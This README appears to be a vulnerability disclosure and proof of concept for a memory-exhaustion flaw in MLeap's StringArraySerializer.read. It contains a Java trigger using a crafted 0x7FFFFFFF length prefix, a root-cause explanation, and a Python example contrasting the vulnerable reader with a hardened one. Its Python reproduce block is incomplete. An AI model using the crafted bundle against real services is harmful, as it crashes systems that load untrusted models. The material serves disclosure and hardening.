# MLeap StringArraySerializer OOM PoC

Proof-of-concept for an uncontrolled resource consumption vulnerability in MLeap's `StringArraySerializer.read`.

## Files
- `evil.mleap`: crafted MLeap bundle ZIP. Loading it triggers `OutOfMemoryError` via `new Array[Byte](0x7FFFFFFF)` in `StringArraySerializer.read`.

## Reproduce
```python
import struct, zipfile, io, base64
from mleap.pyspark.spark_support import SimpleSparkSerializer
# Or load via BundleFile in Scala/Java:
# BundleFile.load("evil.mleap")
```

## Root Cause
`StringArraySerializer.read` calls `din.readInt()` on attacker-controlled bytes and passes the result directly to `new Array[Byte](size)` with no bounds check. `OutOfMemoryError` extends `VirtualMachineError`; Scala's `NonFatal` extractor returns false for it, so the surrounding `Try{}` does not catch it — the error propagates and crashes the process.

## Trigger (Java)
```java
import java.io.*;

public class Trigger {
    public static void main(String[] args) throws IOException {
        // The four bytes a crafted length prefix carries: 0x7FFFFFFF
        DataInputStream din = new DataInputStream(
            new ByteArrayInputStream(new byte[]{0x7F,(byte)0xFF,(byte)0xFF,(byte)0xFF}));
        int size = din.readInt();       // 2147483647
        byte[] bytes = new byte[size];  // OutOfMemoryError: Requested array size exceeds VM limit
    }
}
```
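The root-cause section above describes a length prefix that is trusted and allocated before any validation, and the trigger shows the prefix that sets it off. The following is an added example, not MLeap's code and not part of the PoC: it models the read path in Python with the vulnerable shape (`read_bytes_unchecked`) next to a hardened reader that validates the prefix against a policy cap and against the bytes actually present before allocating. The wire format (a 4-byte big-endian signed length, then that many bytes; a count prefix for the array), the caps `MAX_ELEMENT_BYTES` and `MAX_ELEMENTS`, the function names and all sample payloads are assumptions made for this example, not MLeap's actual encoding.

```python
import io
import struct

# Assumed wire format (modelled on the page's description of the read path,
# not MLeap's exact encoding): a 4-byte big-endian signed int length prefix,
# which is what DataInputStream.readInt returns, followed by that many bytes.
INT_FMT = ">i"
MAX_ELEMENT_BYTES = 1 << 20  # 1 MiB per element: a policy cap chosen for this example
MAX_ELEMENTS = 100_000       # cap on array length: also a policy choice


class MalformedBundle(ValueError):
    """Raised for any prefix that cannot describe a real payload."""


def _read_int(din: io.BytesIO) -> int:
    raw = din.read(4)
    if len(raw) != 4:
        raise MalformedBundle("truncated length prefix")
    return struct.unpack(INT_FMT, raw)[0]


def _remaining(din: io.BytesIO) -> int:
    # Bytes left in the buffer; for a ZIP entry the entry size serves the same role.
    return len(din.getbuffer()) - din.tell()


def read_bytes_unchecked(din: io.BytesIO) -> bytes:
    """Vulnerable shape: trust the prefix, allocate, only then read."""
    size = _read_int(din)
    buf = bytearray(size)  # allocation happens before any validation
    n = din.readinto(buf)
    return bytes(buf[:n])


def read_bytes_checked(din: io.BytesIO, max_bytes: int = MAX_ELEMENT_BYTES) -> bytes:
    """Hardened reader: reject negative, oversized and unbacked lengths before allocating."""
    size = _read_int(din)
    if size < 0:
        raise MalformedBundle(f"negative length {size}")
    if size > max_bytes:
        raise MalformedBundle(f"length {size} exceeds cap {max_bytes}")
    if size > _remaining(din):
        raise MalformedBundle(f"length {size} exceeds {_remaining(din)} bytes remaining")
    return din.read(size)  # bounded and backed by real input


def read_string_array_checked(din: io.BytesIO) -> list:
    """Same check one level up: the element count is bounded by policy and by
    what the stream can hold (every element needs at least its 4-byte prefix)."""
    count = _read_int(din)
    if count < 0 or count > MAX_ELEMENTS:
        raise MalformedBundle(f"element count {count} out of range")
    if count * 4 > _remaining(din):
        raise MalformedBundle(f"element count {count} cannot fit in {_remaining(din)} bytes remaining")
    return [read_bytes_checked(din).decode("utf-8") for _ in range(count)]


def classify(payload: bytes) -> tuple:
    """Run the hardened array reader and report (accepted, detail)."""
    try:
        values = read_string_array_checked(io.BytesIO(payload))
    except (MalformedBundle, UnicodeDecodeError) as exc:
        return False, str(exc)
    return True, repr(values)


def unchecked_single(payload: bytes) -> bytes:
    """Run the vulnerable reader; only ever call it on a benign payload."""
    return read_bytes_unchecked(io.BytesIO(payload))


def encode_string_array(values: list) -> bytes:
    """Encoder for the assumed format, used to build the benign sample."""
    out = struct.pack(INT_FMT, len(values))
    for v in values:
        b = v.encode("utf-8")
        out += struct.pack(INT_FMT, len(b)) + b
    return out


# Constructed samples (not taken from the PoC bundle).
BENIGN = encode_string_array(["feature_a", "feature_b"])
SINGLE_BENIGN = struct.pack(INT_FMT, 5) + b"hello"
OVERSIZED_ELEMENT = struct.pack(INT_FMT, 1) + b"\x7f\xff\xff\xff"  # the page's 0x7FFFFFFF prefix
NEGATIVE_ELEMENT = struct.pack(INT_FMT, 1) + b"\xff\xff\xff\xff"   # readInt is signed: -1
TRUNCATED = struct.pack(INT_FMT, 1) + struct.pack(INT_FMT, 100) + b"short"
HUGE_COUNT = b"\x7f\xff\xff\xff"

if __name__ == "__main__":
    samples = [("benign", BENIGN), ("oversized", OVERSIZED_ELEMENT),
               ("negative", NEGATIVE_ELEMENT), ("truncated", TRUNCATED),
               ("huge_count", HUGE_COUNT)]
    for name, sample in samples:
        print(name, classify(sample))
```

The order of checks is the point: a sign check, a policy cap and a comparison against the bytes that actually exist all happen before any allocation, so a crafted prefix ends in a catchable `MalformedBundle` rather than an allocation attempt. That ordering is what the `Try` in the root-cause section cannot substitute for, since `OutOfMemoryError` is outside what `NonFatal` matches and is thrown after the damage is done.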